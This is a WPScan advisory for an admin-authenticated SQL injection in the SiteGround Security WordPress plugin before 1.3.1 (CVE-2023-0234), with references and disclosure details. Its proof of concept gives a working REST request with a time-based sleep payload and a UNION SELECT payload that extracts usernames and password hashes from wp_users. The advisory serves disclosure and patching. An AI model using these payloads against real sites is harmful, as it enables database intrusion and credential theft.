WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

SiteGround Security < 1.3.1 - Admin+ SQLi

Description

The plugin does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue.

Proof of Concept

1:

POST /wordpress/index.php/wp-json/sg-security/v1/activity-registered HTTP/1.1
Host: YOUR HOST
X-WP-Nonce: YOUR NONCE
Cookie: [Admin+]
Content-Length: 155

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1-sleep(3); #"}]}]}

2:

Alternate payload for extracting info from the wp_users table;

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1 UNION SELECT 1,1,1,user_login,user_pass,1,1,1,1,1,1,1 FROM wp_users; #"}]}]}

Affects Plugins

sg-security
Fixed in version 1.3.1

References

CVE
CVE-2023-0234
URL
https://github.com/namah-age/CVEs/blob/master/1.md
URL
https://www.siteground.com/viewtos/responsible_disclosure_policy?scid=4&lang=en

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

So Sakaguchi

Submitter

So Sakaguchi

Submitter twitter
Mokusou4
Verified

Yes

WPVDB ID
acf3e369-1290-4b3f-83bf-2209b9dd06e1

Timeline

Publicly Published

2023-01-13 (about 4 months ago)

Added

2023-01-13 (about 4 months ago)

Last Updated

2023-01-13 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin